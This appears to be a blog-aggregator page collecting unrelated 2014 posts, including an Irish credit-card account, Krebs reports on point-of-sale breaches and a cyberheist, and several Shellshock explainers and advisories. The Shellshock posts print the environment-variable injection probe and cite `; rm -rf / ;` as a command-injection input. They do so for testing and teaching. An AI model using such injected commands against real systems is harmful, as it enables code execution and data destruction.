But the question becomes: why do I need a credit card at all? The answer lies in the mess that is the Irish banking system. Since there is no "good" bank over here, I've been using the same bank I signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if your balance never goes below €2.5k for the whole quarter. This is not the "usual" style I've seen from American banks, which expect your average balance not to drop below a certain amount; here it does not matter if one day you have no money and the next you have €10k: if for a single day in the quarter you dip below the threshold, you pay for the account, and dearly. At that point every single operation becomes a €0.20 charge, including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits, and every single use of your debit card. For a while NFC payments were excluded, so I tried to use them more, but very few merchants accepted them, and the €15 limit made them impractical for most purchases. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are, on the other hand, free; there are sometimes charges for overseas usage (foreign transactions), and you are charged interest if you don't pay off the full balance at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, at €30/year. That is a whole lot more than Italy, where it was €1.81 until they dropped it entirely. So my requirement for a credit card is essentially to hide as much of these costs as possible. This means that just getting a standard AIB card is not going to be very useful: yes, I would save money after the first 150 operations, but I would save even more by simply keeping those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you earn 1 Clubcard point for every €2 spent. Since each point is worth a €0.01 discount at the end of the quarter, it's almost a cashback, as long as you buy your groceries from Tesco (which I do, because it's handy to have the delivery rather than having to go out, especially for things that are frozen or that weigh a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to earn back the stamp duty through the cashback alone, and it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, the mobile phone, …
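As a rough sanity check of that claim (my own arithmetic, assuming 1 point per €2 and €0.01 per point against the €30/year stamp duty):

```shell
# Break-even spend at 0.5% pointback against €30/year stamp duty:
spend=6000                    # euro put through the card in a year
points=$((spend / 2))         # 1 Clubcard point per €2 spent
cashback=$((points / 100))    # €0.01 per point, in whole euro
echo "spend €$spend -> $points points -> €$cashback back"
```

So €6000/year, or €500/month, is the break-even point, and maxing out a €750 monthly limit clears it comfortably.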

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kind of obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill. The problem starts when you notice that they ask for an original, not a copy "from the Internet". That does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more. The bank was the hardest to convince: for over a year they kept sending me a paper letter for every single wire I received, with the exception of my pay; that included money coming from colleagues when I acted as a payment hub, PayPal transfers for verification purposes, and Amazon KDP revenue, one per country! Luckily, they accepted a colour-printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving licence or any other Irish ID. I made a proper copy of it, in colour, and brought it to my doctor for certification; he stamped and dated and declared, but it was not accepted. I brought it to An Post – the Irish postal service – told them Tesco wanted a specific declaration on it, and showed them the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and repeated Tesco's request; not only did they refuse to comply, they told me they are not allowed to do what Tesco was asking of them, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending out four more cards to friends and family, and in particular I wanted one sent to my mother, so that she has a way to pay for things and debit them to me, letting me help her out. Of course, as I said, it has a cost, and a hefty one. On the other hand, it allows one more trick: you can pay the membership fee through the same rewards programme they sign you up for. I don't remember how much you have to spend in a year to cover it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank should be taking on the onus of paying for the first €15k debt I would incur and wouldn't be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, with a feeble, laughable rewards programme, but at least I have it, and it should be able to repay itself. I'm still looking for a MasterCard I can get, to hedge my bets on card acceptance – it turns out that Visa is not well received in the Netherlands and in Germany – and that can repay its own stamp duty.


Signature Systems Inc., the point-of-sale vendor blamed for a credit and debit card breach involving some 216 Jimmy John’s sandwich shop locations, now says the breach also may have jeopardized customer card numbers at nearly 100 other independent restaurants across the country that use its products.

Earlier this week, Champaign, Ill.-based Jimmy John’s confirmed suspicions first raised by this author on July 31, 2014: That hackers had installed card-stealing malware on cash registers at some of its store locations. Jimmy John’s said the intrusion — which lasted from June 16, 2014 to Sept. 5, 2014 — occurred when hackers compromised the username and password needed to remotely administer point-of-sale systems at 216 stores.

Those point-of-sale systems were produced by Newtown, Pa., based payment vendor Signature Systems. In a statement issued in the last 24 hours, Signature Systems released more information about the break-in, as well as a list of nearly 100 other stores — mostly small mom-and-pop eateries and pizza shops — that were compromised in the same attack.

“We have determined that an unauthorized person gained access to a user name and password that Signature Systems used to remotely access POS systems,” the company wrote. “The unauthorized person used that access to install malware designed to capture payment card data from cards that were swiped through terminals in certain restaurants. The malware was capable of capturing the cardholder’s name, card number, expiration date, and verification code from the magnetic stripe of the card.”

Meanwhile, there are questions about whether Signature’s core product — PDQ POS — met even the most basic security requirements set forth by the PCI Security Standards Council for point-of-sale payment systems. According to the council’s records, PDQ POS was not approved for new installations after Oct. 28, 2013. As a result, any Jimmy John’s stores and other affected restaurants that installed PDQ’s product after the Oct. 28, 2013 sunset date could be facing fines and other penalties.

This snapshot from the PCI Council shows that PDQ POS was not approved for new installations after Oct. 28, 2013.
What’s more, the company that performed the security audit on PDQ — a now-defunct firm called Chief Security Officers — appears to be the only qualified security assessment firm to have had their certification authority revoked (PDF) by the PCI Security Standards Council.

In response to inquiry from KrebsOnSecurity, Jimmy John’s noted that of the 216 impacted stores, 13 were opened after October 28, 2013.

“We understood, from our point of sale technology vendor, that payment systems installed in those stores, as with all locations, were PCI compliant,” Jimmy Johns said in a statement. “We are working independently, and moving as quickly as possible, to install PCI compliant stand-alone payment terminals in those 13 stores.  This is being overseen by Jimmy John’s director of information technology, who will confirm completion of this work directly with each location.  As part of our broader response to the security incident, action has already been taken in those 13 stores, as well as the other impacted locations, to remove malware, and to install and assure the use of dual-factor authentication for remote access and encrypted swipe technology for store purchases.  In addition, the systems used in all of our stores are scanned every day for malware.”

For its part, Signature Systems says it has been developing a new payment application that features card readers that utilize point-to-point encryption capable of blocking point-of-sale malware.


Tech media has been all the rage this year with trying to hype everything out there as the end of the Internet of Things, or the nail in the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason the security issues found were considered so nasty is that we know the affected software is widely used.

First there was Heartbleed, whose discoverers decided to spend time setting up a cool name, logo and website for it, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificates. This at least spawned some interest around OpenSSL, including the OpenBSD fork, which I'm still not sure is going to stick around or not.

Just a few weeks ago a dump of passwords caused a major stir, as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault that the photos of a bunch of celebrities were stolen and published on a bunch of sites — photos that will probably never be expunged from the Internet's collective consciousness.

And then there is the whole hysteria about shellshock which I already dug into. What I promised on that post is looking at the problem from the angle of the project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and catered to corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers didn't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle, which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is the FSF's choice of UNIX shell. The fact that the man page states plainly It's too big and too slow. should tip people off, but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using it as one — though that, too, is a big part of what caused this particular issue.

The health of bash was not considered good by anybody involved with it at the distribution level. It certainly was not considered good by me: I moved to zsh years and years ago, and I have been working for over five years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX-shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer as the GNU website calls him, Chet Ramey – and the sole point of contact for him are the mailing lists. The code is released in dumps: a release tarball on the minor version, then every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can notice this as when emerging bash, you'll see all the patches being applied one on top of the other.

There is no public SCM — yes, there is a Git "repository", but it's essentially just an import of a given release tarball, with each released patch applied on top of it as a commit. Since these patches represent a whole point release, and may be fixing several unrelated bugs at once, it's definitely not as useful as having a repository where the intent of each change shows clearly, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff between code dumps.

This is not completely unknown in the GNU sphere, glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts sanity is being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years: not this particular vulnerability, but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers until now (it's done now), and I have been pushing for a while for Gentoo to have /bin/sh provided by dash, as Debian already did; the result is that for them this vulnerability is far less scary.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it is not developed in the open like many other projects; it is developed behind closed doors, with one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!


As if consumers weren’t already suffering from breach fatigue: Experts warn that attackers are exploiting a critical, newly-disclosed security vulnerability present in countless networks and Web sites that rely on Unix and Linux operating systems. Experts say the flaw, dubbed “Shellshock,” is so intertwined with the modern Internet that it could prove challenging to fix, and in the short run is likely to put millions of networks and countless consumer records at risk of compromise.

The bug is being compared to the recent Heartbleed vulnerability because of its ubiquity and sheer potential for causing havoc on Internet-connected systems — particularly Web sites. Worse yet, experts say the official patch for the security hole is incomplete and could still let attackers seize control over vulnerable systems.

The problem resides with a weakness in the GNU Bourne Again Shell (Bash), the text-based, command-line utility on multiple Linux and Unix operating systems. Researchers discovered that if Bash is set up to be the default command line utility on these systems, it opens those systems up to specially crafted remote attacks via a range of network tools that rely on it to execute scripts, from telnet and secure shell (SSH) sessions to Web requests.

According to several security firms, attackers are already probing systems for the weakness, and at least two computer worms are actively exploiting the flaw to install malware. Jaime Blasco, labs director at AlienVault, has been running a honeypot on the vulnerability since yesterday to emulate a vulnerable system.

“With the honeypot, we found several machines trying to exploit the Bash vulnerability,” Blasco said. “The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system. This malware turns the systems into bots that connect to a C&C server where the attackers can send commands, and we have seen the main purpose of the bots is to perform distributed denial of service attacks.”

The vulnerability does not impact Microsoft Windows users, but there are patches available for Linux and Unix systems. In addition, Mac users are likely vulnerable, although there is no official patch for this flaw from Apple yet. I’ll update this post if we see any patches from Apple.

Update, Sept. 29 9:06 p.m. ET: Apple has released an update for this bug, available for OS X Mavericks, Mountain Lion, and Lion.

The U.S.-CERT’s advisory includes a simple command line script that Mac users can run to test for the vulnerability. To check your system from a command line, type or cut and paste this text:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If the system is vulnerable, the output will be:

vulnerable
this is a test
An unaffected (or patched) system will output:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
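The same check can be wrapped in a small script that prints a verdict instead of raw shell output (a sketch of my own, not an official tool):

```shell
# Wraps the US-CERT one-liner; a patched bash prints nothing on stdout,
# so only a vulnerable bash echoes the word "vulnerable" there.
if env x='() { :;}; echo vulnerable' bash -c ":" 2>/dev/null | grep -q vulnerable
then
    echo "this bash is vulnerable"
else
    echo "this bash looks patched"
fi
```
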
US-CERT has a list of operating systems that are vulnerable. Red Hat and several other Linux distributions have released fixes for the bug, but according to US-CERT the patch has an issue that prevents it from fully addressing the problem.

The Shellshock bug is being compared to Heartbleed because it affects so many systems; determining which are vulnerable and developing and deploying fixes to them is likely to take time. However, unlike Heartbleed, which only allows attackers to read sensitive information from vulnerable Web servers, Shellshock potentially lets attackers take control over exposed systems.

“This is going to be one that’s with us for a long time, because it’s going to be in a lot of embedded systems that won’t get updated for a long time,” said Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley. “The target computer has to be accessible, but there are a lot of ways that this turns accessibility into full local code execution. For example, one could easily write a scanner that would basically scan every Web site on the planet for vulnerable (Web) pages.”

Stay tuned. This one could get interesting very soon.


Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and now makes everybody go insane. But around this, there's more buzz than actual fire. The problem I think is that there are a number of claims around this vulnerability that are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS that tried to calm down the situation as well.

Yes, the bug is nasty, and yes, the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all the UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have been defaulting to dash for their /bin/sh for years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it's obvious: you pass down the CGI variables carrying the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.

Using system() is already a red flag for me in lots of server-side software: input sanitization is essential in that situation, since otherwise passing user-provided strings to a system() call makes remote code execution trivial. Think of software calling system("convert %s %s-thumb.png") with a user-provided string, and let the user provide ; rm -rf / ; as their input. Can you see the problem? But with this particular bash bug you don't need user-supplied strings to be passed to system(): the mere call causes the environment to be copied over and thus the code to be executed. This relies on /bin/sh being bash, which is not the case on the BSDs, Debian, Ubuntu and in a bunch of other situations. It also requires that the attacker be able to set an environment variable.
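The function-import bug can be demonstrated locally, without any web server involved; this is the widely circulated probe for CVE-2014-6271 (the variable name x and the echoed strings are arbitrary):

```shell
# Put a function definition with trailing commands into an environment
# variable, then start bash. An unpatched bash parses the variable on
# startup and runs the trailing "echo vulnerable"; a patched bash only
# prints "completed".
env x='() { :;}; echo vulnerable' bash -c 'echo completed'
```

In the CGI scenario the same string arrives in an attacker-controlled request header such as User-Agent, which the web server exports verbatim as the HTTP_USER_AGENT environment variable before handing off to the script.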

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This can be the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages, that script uses #!/bin/bash explicitly, making those systems vulnerable even though their default shell is not bash.
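The point is that the shebang line, not the system's default shell, decides which interpreter runs a hook script. A throwaway sketch (the /tmp path and file name are made up for illustration, not the real dhclient hook):

```shell
# A hook script that names bash explicitly, as the Debian/Ubuntu
# dhclient-script does, runs under bash even on systems where
# /bin/sh points at dash.
cat > /tmp/demo-hook <<'EOF'
#!/bin/bash
echo "hook ran"
EOF
chmod +x /tmp/demo-hook
head -n 1 /tmp/demo-hook   # the interpreter the kernel will use
/tmp/demo-hook
```

So to audit a system, it is the #!/bin/bash scripts reachable from network-facing services that matter, not the login shell.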

But who seriously uses CGI in production nowadays? It turns out that a bunch of people using WordPress do, to run PHP, and I'm sure there are scripts using system(). If this is a nail in the coffin of something, my opinion is that it should be in the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is on CGI running in small devices: routers, TVs, and so on and so forth. It is indeed the case that the majority of those devices implement their web interfaces through CGI, because it's simple and proven and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of the people out there wouldn't go near bash with a 10-foot pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably already have busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable" and "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true; as SANS points out, only a minimal fraction of those devices is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again regarding "project health", talking a bit more about bash as a project. In the meantime, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out, the first fix was not properly thought out), and make sure you don't self-host the stuff you want to keep out of the cloud on a server you upgrade once a year.


BASH shell bug Official PC-BSD Blog | 2014-09-25 19:33 UTC

As many of you are probably aware, there is a serious security issue that is currently all over the web regarding the GNU BASH shell.  We at the PC-BSD project are well aware of the issue, a fix is already in place to plug this security hole, and packages with this fix are currently building. Look for an update to your BASH shell within the next 24 hours in the form of a package update.

As a side note: nothing written by the PC-BSD project uses BASH in any way, and BASH is not built into the FreeBSD operating system itself (it is an optional port/package), so the severity of this bug is lower on FreeBSD than on other operating systems.

On the FreeBSD mailing list, Bryan Drewery has already sent a notice that the port is fixed. Since he also added some good recommendations for BASH users in that email, we decided to copy it here for anyone else who is interested.
_______________

From: Bryan Drewery — FreeBSD mailing list

The port is fixed with all known public exploits. The package is
building currently.

However bash still allows the crazy exporting of functions and may still
have other parser bugs. I would recommend for the immediate future not
using bash for forced ssh commands as well as these guidelines:

1. Do not ever link /bin/sh to bash. This is why it is such a big
problem on Linux, as system(3) will run bash by default from CGI.
2. Web/CGI users should have shell of /sbin/nologin.
3. Don’t write CGI in shell script / Stop using CGI
4. httpd/CGId should never run as root, nor “apache”. Sandbox each
application into its own user.
5. Custom restrictive shells, like scponly, should not be written in bash.
6. SSH authorized_keys/sshd_config forced commands should also not be
written in bash.
_______________

For more information on the bug itself, you can visit Ars Technica and read the article at the link below.

http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/


Conferencing Flameeyes's Weblog | 2014-09-25 18:57 UTC

This past weekend I had the honor of hosting the VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I have organized a conference (or rather helped organize it; Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and do better the next time I try something like this.


Photo credit: me
Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, since Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong, as he had to get an (easy) visa on entry.

Getting just shy of a hundred people into a city like Dublin, which is far from a metropolis like Paris or London, is an interesting exercise. Yes, we had the space for the conference itself, but finding hotels and restaurants for that many people became tricky. A very positive shout-out is due to Yamamori Sushi, which hosted all of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration: knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful when attitudes can be a bit grating on the net. And given that many people, including me, are known as proponents of Troll-Driven Development (or Rant-Driven Development, now that Anon, redditors and 4channers have given "troll" an even worse connotation), it's really a requirement if you are genuinely interested in being part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie and to leave it to people who would actually use it, although I did pick up a Gandi VLC shirt. I hope I'll manage the same at LISA, as I'm bound there too; last year I came back with way too many shirts and other swag.


A Texas bank that’s suing a customer to recover $1.66 million spirited out of the country in a 2012 cyberheist says it now believes the missing funds are still here in the United States — in a bank account that’s been frozen by the federal government as part of an FBI cybercrime investigation.

In late June 2012, unknown hackers broke into the computer systems of Luna & Luna, LLP, a real estate escrow firm based in Garland, Texas. Unbeknownst to Luna, hackers had stolen the username and password that the company used to manage its account at Texas Brand Bank (TBB), a financial institution also based in Garland.

Between June 21, 2012 and July 2, 2012, fraudsters stole approximately $1.75 million in three separate wire transfers. Two of those transfers went to an account at the Industrial and Commercial Bank of China. That account was tied to the Jixi City Tianfeng Trade Limited Company in China. The third wire, in the amount of $89,651, was sent to a company in the United States, and was recovered by the bank.

Jixi is in the Heilongjiang province of China on the border with Russia, a region apparently replete with companies willing to accept huge international wire transfers without asking too many questions. A year before this cyberheist took place, the FBI issued a warning that cyberthieves operating out of the region had been the recipients of approximately $20 million in the year prior — all funds stolen from small to mid-sized businesses through a series of fraudulent wire transfers sent to Chinese economic and trade companies (PDF) on the border with Russia.

Luna became aware of the fraudulent transfers on July 2, 2012, when the bank notified the company that it was about to overdraw its accounts. The theft put Luna & Luna in a tough spot: The money the thieves stole was being held in escrow for the U.S. Department of Housing and Urban Development (HUD). In essence, the crooks had robbed Uncle Sam, and this was exactly the argument that Luna used to talk its bank into replacing the missing funds as quickly as possible.

“Luna argued that unless TBB restored the funds, Luna and HUD would be severely damaged with consequences to TBB far greater than the sum of the swindled funds,” TBB wrote in its original complaint (PDF). TBB notes that it agreed to reimburse the stolen funds, but that it also reserved its right to legal claims against Luna to recover the money.

When TBB later demanded repayment, Luna refused. The bank filed suit on July 1, 2013, in state court, suing to recover the approximately $1.66 million that it could not claw back, plus interest and attorney’s fees.

For the ensuing year, TBB and Luna wrangled in the courts over the venue of the trial. Luna also counterclaimed that the bank’s security was deficient because it only relied on a username and password, and that TBB should have flagged the wires to China as highly unusual.

TBB notes that per a written agreement with the bank, Luna had instructed the bank to process more than a thousand wire transfers from its accounts to third-party accounts. Further, the bank pointed out that Luna had been offered but refused “dual controls,” a security measure that requires two employees to sign off on all wire transfers before the money is allowed to be sent.

In August, Luna alerted (PDF) the U.S. District Court for the Northern District of Texas that in direct conversations with the FBI, an agent involved in the investigation disclosed that the $1.66 million in stolen funds were actually sitting in an account at JPMorgan Chase, which was the receiving bank for the fraudulent wires. Both Luna and TBB have asked the government to consider relinquishing the funds to help settle the lawsuit.

The FBI did not return calls seeking comment. The Office of the U.S. attorney for the Northern District of Texas, which is in the process of investigating potential criminal claims related to the fraudulent transfers, declined to comment except to say that the case is ongoing and that no criminal charges have been filed to date.

As usual, this cyberheist resulted from missteps by both the bank and the customer. Dual controls are a helpful — but not always sufficient — security control that Luna should have adopted, particularly given how often these cyberheists are perpetrated against title and escrow firms. But it is galling that it is easier to find more robust, customer-facing security controls at your average email or other cloud service provider than it is at one of thousands of financial institutions in the United States.

If you run a small business and are managing your accounts online, you’d be wise to expect a similar attack on your own accounts and prepare accordingly. That means taking your business to a bank that offers more than just usernames, passwords and tokens for security. Shop around for a bank that lets you secure your transfers with some sort of additional authentication step required from a mobile device. These security methods can be defeated of course, but they present an extra hurdle for the bad guys, who probably are more likely to go after the lower-hanging fruit at thousands of other financial institutions that don’t offer more modern security approaches.

But if you’re expecting your bank to protect your assets should you or one of your employees fall victim to a malware phishing scheme, you could be in for a rude awakening. Keep a close eye on your books, require that more than one employee sign off on all large transfers, and consider adopting some of these: Online Banking Best Practices for Businesses.


Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covered SELinux administration commands and focuses on Linux administrators that need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring of this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and on tuning SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and is even the reference platform), even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe works on all of those distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat of a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count at the requested amount, this book was not limited. Also, I think the various stages of the book’s development contributed well to the final result (something I overlooked a bit the first time, so this time I re-re-reviewed changes over and over again: after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.


More than seven weeks after this publication broke the news of a possible credit card breach at nationwide sandwich chain Jimmy John’s, the company now confirms that a break-in at one of its payment vendors jeopardized customer credit and debit card information at 216 stores.

On July 31, KrebsOnSecurity reported that multiple banks were seeing a pattern of fraud on cards that were all recently used at Jimmy John’s locations around the country. That story noted that the company was working with authorities on an investigation, and that multiple Jimmy John’s stores contacted by this author said they ran point-of-sale systems made by Newtown, Pa.-based Signature Systems.

In a statement issued today, Champaign, Ill. based Jimmy John’s said customers’ credit and debit card data was compromised after an intruder stole login credentials from the company’s point-of-sale vendor and used these credentials to remotely access the point-of-sale systems at some corporate and franchised locations between June 16, 2014 and Sept. 5, 2014.

“Approximately 216 stores appear to have been affected by this event,” Jimmy John’s said in the statement. “Cards impacted by this event appear to be those swiped at the stores, and did not include those cards entered manually or online. The credit and debit card information at issue may include the card number and in some cases the cardholder’s name, verification code, and/or the card’s expiration date. Information entered online, such as customer address, email, and password, remains secure.”

The company has posted a listing on its Web site — jimmyjohns.com — of the restaurant locations affected by the intrusion. There are more than 1,900 franchised Jimmy John’s locations across the United States, meaning this breach impacted roughly 11 percent of all stores.

The statement from Jimmy John’s doesn’t name the point of sale vendor, but company officials confirm that the point-of-sale vendor that was compromised was indeed Signature Systems. Officials from Signature Systems could not be immediately reached for comment, and it remains unclear if other companies that use its point-of-sale solutions may have been similarly impacted.

Point-of-sale vendors remain an attractive target for cyber thieves, perhaps because so many of these vendors enable remote administration on their hardware and yet secure those systems with little more than a username and password — and often easy-to-guess credentials to boot.

Last week, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.




More than 15 cents Hanno's blog | 2014-09-22 14:48 UTC

For months we have been reading fresh horror stories about the spread of Ebola almost daily. I don't think I need to repeat them here.

For many of us, myself included, Ebola is far away, and not only in the spatial sense. I have never seen an Ebola patient, and I know almost nothing about the affected countries such as Sierra Leone, Liberia or Guinea. Many people surely feel the same way, and I, too, have only registered many of the reports in passing. But one thing has stuck with me: the problem is not that we don't know how to stop Ebola. The problem is that it isn't being done, that those who want to help, often at the risk of their own lives, are not given sufficient means.

One number I read in the last few days has stayed with me: the German federal government has so far provided 12 million euros for Ebola relief. That works out to roughly 15 cents per inhabitant. I lack the words to describe that adequately; it is somewhere between embarrassing, irresponsible and scandalous. Germany is one of the wealthiest countries in the world. I will spare you comparisons with bank bailouts or underground railway stations.

Yesterday I donated to Ärzte ohne Grenzen (Doctors Without Borders). As far as I can tell, it is currently the most important organization trying to help on the ground, and everything I know about it gives me the feeling that my money is in good hands there. The amount was several orders of magnitude more than 15 cents, but it was also an amount that, given my financial means, does not hurt me.

I don't actually think this is how it should be. It should go without saying that the world community helps in an emergency like this. Whether a deadly disease gets fought should not depend on donations; I actually want to pay for such things with my taxes. But the reality is that this is not happening right now.

I am not writing this to emphasize how great I am. I am writing it because I want to ask you, the person reading this right now, to do the same. I believe everyone reading this is able to donate more than 15 cents. Donate an amount that seems affordable and appropriate given your financial situation. Right now. It only takes a few minutes:

Donate online to Ärzte ohne Grenzen

(I would be glad to see this post spread and shared, for example with the hashtag #mehrals15cent)


Hardly a week goes by when I don’t hear from a reader wondering about the origins of a bogus credit card charge for $49.95 or some similar amount for a product they never ordered. As this post will explain, such charges appear to be the result of crooks trying to game various online affiliate programs by using stolen credit cards.

Bogus $49.95 charges for herbal weight loss products like these are showing up on countless consumer credit statements.
Most of these charges are associated with companies marketing products of dubious value and quality, typically by knitting a complex web of front companies, customer support centers and card processing networks. Whether we’re talking about a $49.95 payment for a bottle of overpriced vitamins, $12.96 for some no-name software title, or $9.84 for a dodgy Internet marketing program, the unauthorized charge usually is for a good or service that is intended to be marketed by an online affiliate program.

